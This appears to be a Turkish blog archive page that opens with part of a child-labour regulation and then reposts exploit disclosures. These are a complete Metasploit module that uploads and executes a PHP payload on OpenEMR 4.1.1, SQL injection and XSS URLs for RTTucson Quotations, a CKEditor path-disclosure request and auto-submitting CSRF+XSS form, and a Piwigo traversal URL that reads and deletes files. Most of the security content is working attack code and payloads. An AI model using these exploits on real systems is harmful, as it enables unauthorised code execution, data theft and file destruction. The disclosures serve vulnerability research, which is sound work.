Archive for 25 Şubat 2013

Çocuk ve Genç İşçilerin Çalıştırılma Usul ve Esasları Hakkında Yönetmelik

 

Çalışma ve Sosyal Güvenlik Bakanlığından:

 

Çocuk ve Genç İşçilerin Çalıştırılma Usul ve Esasları Hakkında Yönetmelik

 

(06 Nisan 2004 tarih ve 25425 sayılı R.,G’de yayımlanmıştır.)

 

BİRİNCİ KISIM

 

Genel Hükümler

 

BİRİNCİ BÖLÜM

 

Amaç, Kapsam, Dayanak ve Tanımlar

 

Amaç

 

Madde 1 — Bu Yönetmeliğin amacı, çocuk ve genç işçilerin sağlık ve güvenliklerini, fiziksel, zihinsel, ahlaki ve sosyal gelişmelerini veya öğrenimlerini tehlikeye atmadan çalışma şekillerinin esaslarını belirlemek ve ekonomik istismarlarını önlemektir.

 

Kapsam

 

Madde 2 — Bu Yönetmelik, 4857 sayılı İş Kanununun 71 inci maddesi gereğince, 18 yaşını doldurmamış çocuk ve genç işçiler bakımından yasak olan işler ile 15 yaşını tamamlamış, ancak 18 yaşını tamamlamamış genç işçilerin çalışmasına izin verilecek işler, 14 yaşını bitirmiş ve ilköğretimini tamamlamış çocukların çalıştırılabilecekleri hafif işler ve çalışma koşullarına ilişkin usul ve esasları kapsar.

 

Dayanak

 

Madde 3 — Bu Yönetmelik, 10/6/2003 tarihli ve 25134 sayılı Resmî Gazete’de yayımlanarak yürürlüğe giren 4857 sayılı İş Kanununun 71 inci maddesine dayanılarak hazırlanmıştır. Read more

OpenEMR PHP File Upload Vulnerability PHP File Upload Vulnerability

OpenEMR PHP File Upload Açığına ilişkin metasploit exploit aşağıdaki gibidir.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
 
  def initialize(info={})
    super(update_info(info,
      'Name'           => "OpenEMR PHP File Upload Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
        ofc_upload_image.php file from the openflashchart library, a malicious user can
        upload a file to the tmp-upload-images directory without any authentication, which
        results in arbitrary code execution. The module has been tested successfully on
        OpenEMR 4.1.1 over Ubuntu 10.04.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '90222' ],
          [ 'BID', '37314' ],
          [ 'EBD', '24492' ],
          [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
          [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['OpenEMR 4.1.1', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Feb 13 2013",
      'DefaultTarget'  => 0))
 
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
        ], self.class)
  end
 
  def check
    uri = target_uri.path
    peer = "#{rhost}:#{rport}"
 
    # Check version
    print_status("#{peer} - Trying to detect installed version")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "interface", "login", "login.php")
    })
 
    if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
      version = $1
    else
      return Exploit::CheckCode::Unknown
    end
 
    print_status("#{peer} - Version #{version} detected")
 
    if version > "4.1.1"
      return Exploit::CheckCode::Safe
    end
 
    # Check for vulnerable component
    print_status("#{peer} - Trying to detect the vulnerable component")
 
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
    })
 
    if res and res.code == 200 and res.body =~ /Saving your image to/
      return Exploit::CheckCode::Detected
    end
 
    return Exploit::CheckCode::Safe
  end
 
  def exploit
    uri = target_uri.path
 
    peer = "#{rhost}:#{rport}"
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
    my_payload = payload.encoded
 
    print_status("#{peer} - Sending PHP payload (#{payload_name})")
    res = send_request_raw({
      'method'  => 'POST',
      'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
      'headers' => { "Content-Length" => my_payload.length.to_s },
      'data'    => my_payload
    })
 
    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
      fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
    end
 
    register_file_for_cleanup(payload_name)
 
    print_status("#{peer} - Executing PHP payload (#{payload_name})")
    # Execute our payload
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
    })
 
    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either.  Print the status code for debugging purposes.
    if res and res.code != 200
      print_error("#{peer} - Server returned #{res.code.to_s}")
    end
  end
 
end

RTTucson Quotations Database – Multiple Vulnerabilities

RTTucson Quotations Database – Multiple Açıklar bulunmuş olup, Açık bulucunun değerlendirmeleri aşağıdaki şekilde;

##################################################################################
       __            _                      _            ____            
      / /___ _____  (_)_____________ ______(_)__  _____ / __ _________ _
 __  / / __ `/ __ / / ___/ ___/ __ `/ ___/ / _ / ___// / / / ___/ __ `/
/ /_/ / /_/ / / / / (__  |__  ) /_/ / /  / /  __(__  )/ /_/ / /  / /_/ / 
____/__,_/_/ /_/_/____/____/__,_/_/  /_/___/____(_)____/_/   __, /  
                                                                /____/   
##################################################################################                                                                                                                              
RTTucson Quotations Database Script, Multiple Vulnerabilities
Software Page: http://www.rttucson.com/index.html
Script Demo: http://www.rttucson.com/quotations/default.php

Author(Pentester): 3spi0n
On Social: 
Greetz: Grayhatz Inc. and Janissaries Platform.
##################################################################################

[~] MySQL Injection on Demo Site 

[ ] (author.php, ID Param)
> > >  http://server/quotations/author.php?ID=5&#39; (MySQLi Found)

[ ] (category_quotes.php, ID Param)
> > >  http://server/quotations/category_quotes.php?ID=9&#39; (MySQLi Found)

[~] XSS on Demo Site

> >  (quote_search.php, keywords Param)
> > >  http://server/quotations/quote_search.php?keywords= <h1> Xssed-3spi0n </h1> 

CKEditor 4.0.1 – Multiple Vulnerabilities

CKEditor 4.0.1 – Versiyonunda Genel Açıklar Bulunmuş Olup Açık hakkındaki değerlendirmeler şu şekilde.

 

=========================================== Vulnerable Software: ckeditor 4.0.1 standard Download: <a href="http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip">http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip</a> Vulns: Full Path Disclosure && XSS =========================================== Tested On: Debian squeeze 6.0.6 Server version: Apache/2.2.16 (Debian) Apache traffic server 3.2.0 MYSQL: 5.1.66-0+squeeze1 PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59) Copyright (c) 1997-2009 The PHP Group Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH =========================================== Vulnerable Code: /ckeditor/samples/assets/posteddata.php =============SNIP BEGINS====================

<a href="root:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets">root:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets</a># cat posteddata.php <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>         <meta charset="utf-8">         <title>Download</title>         <link rel="stylesheet" href="sample.css"> </head> <body>         <h1>                 CKEditor &mdash; Posted Data         </h1>         <table border="1" cellspacing="0" id="outputSample">                 <colgroup><col width="120"></colgroup>                 <thead>                         <tr>                                 <th>Field&nbsp;Name</th>                                 <th>Value</th>                         </tr>                 </thead> <?php

if ( isset( $_POST ) )         $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST else         $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {         if ( get_magic_quotes_gpc() )                 $postedValue = htmlspecialchars( stripslashes( $value ) ) ;         else                 $postedValue = htmlspecialchars( $value ) ;

?>                 <tr>                         <th style="vertical-align: top"><?php echo $sForm?></th>                         <td><pre><?php echo $postedValue?></pre></td>                 </tr>         <?php } ?>         </table>         <div id="footer">                 <hr>                 <p>                         CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>                 </p>                 <p id="copy">                         Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.                 </p>         </div> </body> </html>

=============SNIP ENDS HERE====================

&nbsp;

FULL Path Disclosure example:

URL: <a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a> METHOD: $_POST

HEADERS:

Host: hacker1.own User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 30

&nbsp;

$_POST DATA TO SEND:

bangbangbang[]=PATH DISCLOSURE

&nbsp;

Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38

Print screen: <a href="http://i076.radikal.ru/1302/84/edbe3f8f4524.png">http://i076.radikal.ru/1302/84/edbe3f8f4524.png</a>

=================================================

CSRF+XSS <body onload="javascript:document.forms[0].submit()"> <form name="form1" method="post" action="<a href="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php">http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php</a>" enctype="multipart/form-data"> <input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li> </form>

=================================================

Print Screen:  <a href="http://i062.radikal.ru/1302/e6/25ef023dd589.png">http://i062.radikal.ru/1302/e6/25ef023dd589.png</a>

&nbsp;

================================================= And here is fixed version:  /ckeditor/samples/assets/posteddata.php

================SNIP BEGINS======================= <!DOCTYPE html> <?php /* Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved. For licensing, see LICENSE.html or <a href="http://ckeditor.com/license">http://ckeditor.com/license</a> */ ?> <html> <head>   <meta charset="utf-8">   <title>Sample &mdash; CKEditor</title>   <link rel="stylesheet" href="sample.css"> </head> <body>   <h1>     CKEditor &mdash; Posted Data   </h1>   <table border="1" cellspacing="0" id="outputSample">     <colgroup><col width="120"></colgroup>     <thead>       <tr>         <th>Field&nbsp;Name</th>         <th>Value</th>       </tr>     </thead> <?php

if ( isset( $_POST ) )   $postArray = &$_POST ;      // 4.1.0 or later, use $_POST else   $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS

foreach ( $postArray as $sForm => $value ) {   if ( get_magic_quotes_gpc() )     $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;   else   $postedValue =htmlspecialchars((string) $value ) ;

?>     <tr>       <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>       <td><pre><?php echo $postedValue?></pre></td>     </tr>   <?php } ?>   </table>   <div id="footer">     <hr>     <p>       CKEditor - The text editor for the Internet - <a href="<a href="http://ckeditor.com/&quot;>http://ckeditor.com</a">http://ckeditor.com/">http://ckeditor.com</a</a>>     </p>     <p id="copy">       Copyright &copy; 2003-2013, <a href="<a href="http://cksource.com/&quot;>CKSource</a">http://cksource.com/">CKSource</a</a>> - Frederico Knabben. All rights reserved.     </p>   </div> </body> </html>

=============ENJOYYY====================

KUDOSSSSSSS ========================================= packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE ===========================================

/AkaStep

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Açığı Bulunmuş Olup açık hakkında açık bulucunun değerlendirmeleri şu şekilde;

Piwigo 2.4.6 (install.php) Remote Arbitrary File Read/Delete Vulnerability


Vendor: Piwigo project
Product web page: http://www.piwigo.org
Affected version: 2.4.6

Summary: Piwigo is a photo gallery software for the web that comes
with powerful features to publish and manage your collection of
pictures.

Desc: Input passed to the &#39;dl&#39; parameter in &#39;install.php&#39; script
is not properly sanitised before being used to get the contents of
a resource or delete files. This can be exploited to read and delete
arbitrary data from local resources with the permissions of the web
server via directory traversal attack.

====================================================================
/install.php:
-------------

113: if (!empty($_GET[&#39;dl&#39;]) && file_exists(PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;]))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf[&#39;data_location&#39;].&#39;pwg_&#39;.$_GET[&#39;dl&#39;];
116:   header(&#39;Cache-Control: no-cache, must-revalidate&#39;);
117:   header(&#39;Pragma: no-cache&#39;);
118:   header(&#39;Content-Disposition: attachment; filename="database.inc.php"&#39;);
119:   header(&#39;Content-Transfer-Encoding: binary&#39;);
120:   header(&#39;Content-Length: &#39;.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
123:   exit();
124: }

====================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a


Vulnerability discovered by Gjoko &#39;LiquidWorm&#39; Krstic
                            


Advisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php

Vendor Patch: http://piwigo.org/bugs/view.php?id=2843



15.02.2013


--

http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt